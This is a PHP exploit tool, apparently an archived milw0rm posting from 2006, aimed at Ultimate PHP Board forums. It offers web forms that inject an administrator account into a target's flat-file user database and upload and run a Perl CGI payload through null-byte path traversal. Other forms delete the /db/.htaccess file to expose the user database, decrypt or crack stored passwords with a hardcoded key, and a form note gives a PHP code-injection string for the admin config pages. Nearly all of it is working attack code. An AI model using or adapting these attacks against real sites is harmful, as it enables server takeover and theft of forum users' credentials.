<?php
/*
Advisory:
http://www.kliconsulting.com/users/mbrooks/UPBadvisory.rtf
Vendors site:
http://forum.myupb.com/
Download:
http://fileserv.myupb.com/download.php?url=upb196GOLD.zip
http://prdownloads.sourceforge.net/textmb/upb1.8.2.zip?download
Download Mirror:
http://www.kliconsulting.com/users/mbrooks/upb196GOLD.zip
http://www.kliconsulting.com/users/mbrooks/upb1.8.2.zip
*/
//perl cgi code to inject into vulnerable system:
//payload should start with [NR] and end with #;
$perlPayload="[NR] use CGI qw(:standard);print header;print \" start \";print \" 0-day \";print \" exploit \"; print \" code end \";#";
$v1_xKey="wdnyyjinffnruxezrkowkjmtqhvrxvolqqxokuofoqtneltaomowpkfvmmogbayankrnrhmbduzfmpctxiidweripxwglmwrmdscoqyijpkzqqzsuqapfkoshhrtfsssmcfzuffzsfxdwupkzvqnloubrvwzmsxjuoluhatqqyfbyfqonvaosminsxpjqebcuiqggccl";
//taken from ./textdb.inc.php line 324:
function t_decrypt($text,$key){
$crypt = "";
for($i=0;$i<strlen($text);$i++)
{
$i_key = ord(substr($key, $i, 1));
$i_text = ord(substr($text, $i, 1));
$n_key = ord(substr($key, $i+1, 1));
$i_crypt = $i_text + $n_key;
$i_crypt = $i_crypt - $i_key;
$crypt .= chr($i_crypt);
}
return $crypt;
}
function t_encrypt($text, $key)
{
$crypt = "";
for($i=0;$i<strlen($text);$i++)
{
// print $i."key char:".substr($key, $i, 1)."<br>";
$i_key = ord(substr($key, $i, 1));
// print $i."ikey:".$i_key."<br>";
$i_text = ord(substr($text, $i, 1));
// print $i."itext:".$i_text."<br>";
$n_key = ord(substr($key, $i+1, 1));
// print $i."nkey:".$n_key."<br>";
$i_crypt = $i_text + $i_key;
// print $i."T+K_crypt:".$i_crypt ."<br>";
$i_crypt = $i_crypt - $n_key;
// print $i."I-N_crypt:".$i_crypt."<br>";
$crypt .= chr($i_crypt);
$offset0=$i_crypt-$i_text;
// print "key=$i_key - $n_key<br>";
// print "offset0:$offset0=$i_crypt-$i_text<br>";
$offset=$i_key-$n_key;
//print "offset:$offset<br>";
// $broken=$i_text+$offset;
// print "broken:".$broken;
}
return $crypt;
}
function gen_collision($offset, $start){//$start should be a number of an ascii char
$offset_len=strlen($offset);
$x=0;
// print "len:".$offset_len."<br>";
// for($x=0;$x<$offset_len;$x++){//$offset as $off_int){
foreach($offset as $off_char){
if($x==0){
$newkey.=chr($start);
$nextchar=$start;
$x++;
}
// print "next char: $nextchar "."offset:".$off_char."<br>";
$tmp=$nextchar - $off_char;
$newkey.=chr($tmp);
$nextchar=$tmp;
}
return $newkey;
}
function gen_offset($crypt,$text){
$text_len=strlen($text);
for($x=0;$x<$text_len;$x++){
// print "crypt:".substr($crypt, $x, 1).'text:'.substr($text, $x, 1).'<br>';
$cry_hex=ord(substr($crypt, $x, 1));
$txt_hex=ord(substr($text, $x, 1));
$offset[$x]=$cry_hex - $txt_hex;
//print "offset".$offset."crypt".$cry_hex."text".$txt_hex[x]."<br>";
}
return $offset;//numeric array
}
function http_gpc_send( $method, $host, $port ,$usepath,$cookie="", $postdata = "") {
$fp = pfsockopen( $host, $port, &$errno, &$errstr, 120 );
# user-agent name
$ua = "msnbot/1.0 (+http://search.msn.com/msnbot.htm)";
if( !$fp ) {
print "$errstr ($errno)<br>\nn";
} else {
if( $method == "GET" ) {
fputs( $fp, "GET $usepath HTTP/1.0\n" );
}
else if( $method == "POST" ) {
fputs( $fp, "POST $usepath HTTP/1.0\n" );
}
fputs( $fp, "User-Agent: ".$ua."\n" );
fputs($fp, "Host: ".$host."\n");
fputs( $fp, "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n" );
fputs( $fp, "Accept-Language: en-us,en;q=0.5\n" );
fputs( $fp, "Accept-Encoding: gzip,deflate\n" );
fputs( $fp, "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n" );
fputs( $fp, "Cookie: ".$cookie."\n" );
if( $method == "POST" ) {
$strlength = strlen( $postdata );
fputs( $fp, "Content-type: application/x-www-form-urlencoded\n" );
fputs( $fp, "Content-length: ".$strlength."\n\n" );
fputs( $fp, $postdata."\n\n");
}
fputs( $fp, "\n\n" );
$output = "";
while( !feof( $fp ) ) {
$output .= fgets( $fp, 1024 );
}
fclose( $fp );
}
return $output;
}
function getAdmin($victHost, $victPort, $victPath, $exp_user_env,$exp_pass_env,$exp_id_env){
$exp_power_env="3";//admin
$InjectUserPost="u_login=te".rand()."1&u_email=rew".rand()."@wfje.com&u_loca=&u_site=&avatar=images%2Favatars%2Fnoavatar.gif&u_icq=&u_aim=&u_msn=&u_sig=s%3C%7E%3E0%3C%7E%3E2006-04-20%5BNR%5D".$exp_user_env."%3C%7E%3E".$exp_pass_env."%3C%7E%3E".$exp_power_env."%3C%7E%3EA%40a.com%3C%7E%3E%3C%7E%3E%3C%7E%3E%3C%7E%3E1%3C%7E%3E%3C%7E%3E%3C%7E%3E%3C%7E%3E%3C%7E%3E13%3C%7E%3E%3C%7E%3E1%3C%7E%3E".$exp_id_env."&submit=Submit";
http_gpc_send("POST", $victHost, $victPort, $victPath."/register.php", "", $InjectUserPost);
}
if(isset($_REQUEST['vict'])){
$payName="data".rand().".cgi";//must be .cgi
$expPost="u_name=Admin&subject=hey&icon=#!/usr/bin/perl -wT \"&message=$perlPayload&id=/../images/$payName%00";
$exp_user_env="Jockie227";
$exp_pass_env="tZbi}";
$exp_power_env="3";
$exp_id_env=4000000000+rand(0,300000000);
//The script is injecting user into the database; becase of this the cookie is known before the script even contacts the vulnerable "Ultamate PHP Boar". Also note that a time stamp is not needed.
$cookie="user_env=$exp_user_env; pass_env=$exp_pass_env; power_env=$exp_power_env; id_env=$exp_id_env";
$url_parsed = parse_url($_REQUEST['vict']);
if ( empty($url_parsed['scheme']) ) {
$url_parsed = parse_url('http://'.$url);
}
$rtn['url'] = $url_parsed;
$victPort = $url_parsed["port"];
if ( !$port ) {
$victPort = 80;
}
$victPath = $url_parsed["path"];
$victHost = $url_parsed["host"];
print "<title> Ultamate PHP Board Remote Code EXEC 0-Day </title>";
print "<CENTER><B><I>0-day</I></B></CENTER>";
//injecting user into database, this information is used to verify session information
getAdmin($victHost, $victPort, $victPath, $exp_user_env,$exp_pass_env,$exp_id_env);
//http_gpc_send("POST", $victHost, $victPort, $victPath."/register.php", "", $InjectUserPost);
// http_gpc_send("GET", $victHost, $victPort, $victPath."/open.php?id=../images%00", $cookie);
//uploading CGI
$field=http_gpc_send("POST", $victHost, $victPort, $victPath."/newpost.php?a=1&t=1&page=1", $cookie, $expPost);
//making cgi executeable usei "close.php"
http_gpc_send("GET", $victHost, $victPort, $victPath."/close.php?id=../images/".$payName."%00", $cookie);
//executing cgi
$feedBack=http_gpc_send("GET",$victHost, $victPort, $victPath."/images/".$payName);
$field = str_replace("<", "<", $field);
$field = str_replace(">", ">", $field);
// print $field;
print $feedBack;
exit;
}elseif(isset($_REQUEST['victHTA'])){
$expPost="u_name=#&message=#&id=/.htaccess%00";
$exp_user_env="Jockie227";
$exp_pass_env="tZbi}";
$exp_power_env="3";
$exp_id_env=4000000000+rand(0,300000000);
//The script is injecting user into the database; becase of this the cookie is known before the script even contacts the vulnerable Ultamate PHP Board. Also note that a time stamp is not needed.
$cookie="user_env=$exp_user_env; pass_env=$exp_pass_env; power_env=$exp_power_env; id_env=$exp_id_env";
$url_parsed = parse_url($_REQUEST['victHTA']);
if ( empty($url_parsed['scheme']) ) {
$url_parsed = parse_url('http://'.$url);
}
$rtn['url'] = $url_parsed;
$victPort = $url_parsed["port"];
if ( !$port ) {
$victPort = 80;
}
$victPath = $url_parsed["path"];
$victHost = $url_parsed["host"];
//injecting user into database, this information is used to verify session information
getAdmin($victHost, $victPort, $victPath, $exp_user_env,$exp_pass_env,$exp_id_env);
//
$field=http_gpc_send("POST", $victHost, $victPort, $victPath."/newpost.php?a=1&t=1&page=1", $cookie, $expPost);
// $field = str_replace("<", "<", $field);
// $field = str_replace(">", ">", $field);
// print $field;
print "<script>window.location=\"".$_REQUEST['victHTA']."/db/\";</script>" ;
exit;
}else if(isset($_REQUEST['addVict'])){
$url_parsed = parse_url($_REQUEST['addVict']);
if ( empty($url_parsed['scheme']) ) {
$url_parsed = parse_url('http://'.$url);
}
$rtn['url'] = $url_parsed;
$victPort = $url_parsed["port"];
if ( !$port ) {
$victPort = 80;
}
$victPath = $url_parsed["path"];
$victHost = $url_parsed["host"];
$exp_user_env=$_REQUEST["addName"];
$exp_pass_env=t_encrypt($_REQUEST["addPass"],$v1_xKey);
getAdmin($victHost, $victPort, $victPath, $exp_user_env,$exp_pass_env,4000000000+rand(0,300000000));
print "<title> Ultamate PHP Board Remote Code EXEC 0-Day </title>";
print "<CENTER><B> Admin login Name:".$_REQUEST["addName"]."</B></CENTER>";//this exploit code suffers from xss!
print "<CENTER><B> Admin login Password:".$_REQUEST["addPass"]."</B></CENTER>";
exit;
}else if(isset($_REQUEST['decrypt'])){
print "<I>ecrypted password:</I>";
print "<CENTER>".$_REQUEST["decrypt"]."</CENTER>";
print "<B>Decrypted password:</B>";
print "<CENTER><B>".t_decrypt($_REQUEST["decrypt"],$v1_xKey)."</B></CENTER>";
exit;
}else if(isset($_REQUEST['encrypt'])){
print "<I>ecrypted password:</I>";
print "<CENTER>".$_REQUEST["encrypt"]."</CENTER>";
print "<B>Decrypted password:</B>";
print "<CENTER><B>".t_encrypt($_REQUEST["encrypt"],$v1_xKey)."</B></CENTER>";
// print get_key(t_encrypt($_REQUEST["encrypt"],$v1_xKey),$_REQUEST["encrypt"]);
exit;
}else if(isset($_REQUEST['cypher'])&&isset($_REQUEST['plain'])){
$cypher_len=strlen($_REQUEST['cypher']);
$offset=gen_offset($_REQUEST['cypher'],$_REQUEST['plain']);
print "Offset:";
for($x=0;$x<$cypher_len;$x++){
print $offset[$x].':';
}
print '<br>';
$validKeys=0;
$y=0;
for($y=255;$y>=0;$y--){
$newKey[$y]=gen_collision($offset,$y);
$key_len=strlen($newKey[$y]);
print "<br>Key:$y = ";
for($x=0;$x<=$key_len;$x++){
print $newKey[$y][$x];
}
print "<br>Cypher:".t_encrypt($_REQUEST['plain'],$newKey[$y]);
print "<br>Plain :".t_decrypt($_REQUEST['cypher'],$newKey[$y])."<br><br>";
}
exit;
}
print "<title> Ultimate PHP Board Remote Code EXEC 0-Day </title>
<CENTER><B><I>0-day</I></B></CENTER>
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>
<B><I>Get Admin</I></B><br>
<B>Inject an administrative account into UPB:</B>
<p>
<form ACTION=".$_SERVER['PHP_SELF']." method=\"post\">
<p>
Path to attack:<i>(example: http://www.domain.ext/PathToUPB)</i><br>
<input name=\"addVict\" type=\"text\" size=60> <br>
Inject Name:<br>
<input name=\"addName\" type=\"text\" size=60> <br>
Inject Password:<br>
<input name=\"addPass\" type=\"text\" size=60> <br>
<p>
<input type=\"submit\" value=\"Inject Admin\">
</form>
<p>
<B>PHP code injection is possilbe in the admin panel without an exploit. Both admin_config.php and admin_config2.php can be used to execute PHP by tagging on: ' \";phpinfo(); \$crap=\"1 ' to any of the config values </B>( double quotes \" are only used in exploit)</B>
<p>
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>
<B><I>Gain Read Access To The Database</I></B>
<form ACTION=".$_SERVER['PHP_SELF']." method=\"post\">
<p>
Removes /db/.htaccess to allow access to the remote target's flat file database:<i>(example: http://www.domain.ext/PathToUPB [no trailing slash]) (user database in /db/users.dat) </i><br><br>
<input name=\"victHTA\" type=\"text\" size=60> <br>
<p>
<input type=\"submit\" value=\"Attack\">
</form>
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>
<B><I>Crypto</I></B>
<form ACTION=".$_SERVER['PHP_SELF']." method=\"post\">
<p>
Plain Text Password:<br>
<input name=\"encrypt\" type=\"text\" size=60> <br>
<p>
<input type=\"submit\" value=\"Encrypt\">
</form>
<form ACTION=".$_SERVER['PHP_SELF']." method=\"post\">
Encrypted Password:<br>
<input name=\"decrypt\" type=\"text\" size=60> <br>
<p>
<input type=\"submit\" value=\"Decrypt\">
</form>
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>
<form ACTION=".$_SERVER['PHP_SELF']." method=\"post\">
<p>
Plain Text:<br>
<input name=\"plain\" type=\"text\" size=60> <br>
<p>
corosponding cypher text:<br>
<input name=\"cypher\" type=\"text\" size=60> <br>
<p>
<input type=\"submit\" value=\"crack key\">
</form>
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>
<B><I>Proof of Concept Only, Unstable Remote Code Execution Using NON-SQL Database Injection</I></B>
<form ACTION=".$_SERVER['PHP_SELF']." method=\"post\">
<p>
perl CGI Code Injection Attack Remote Target:<br>
<input name=\"vict\" type=\"text\" size=60> <br>
<p>
<input type=\"submit\" value=\"Attack\">
</form>
<B>http://www.domain.ext/PathToUPB (no trailing slash)</B>
</body>";
?>
# milw0rm.com [2006-06-20]
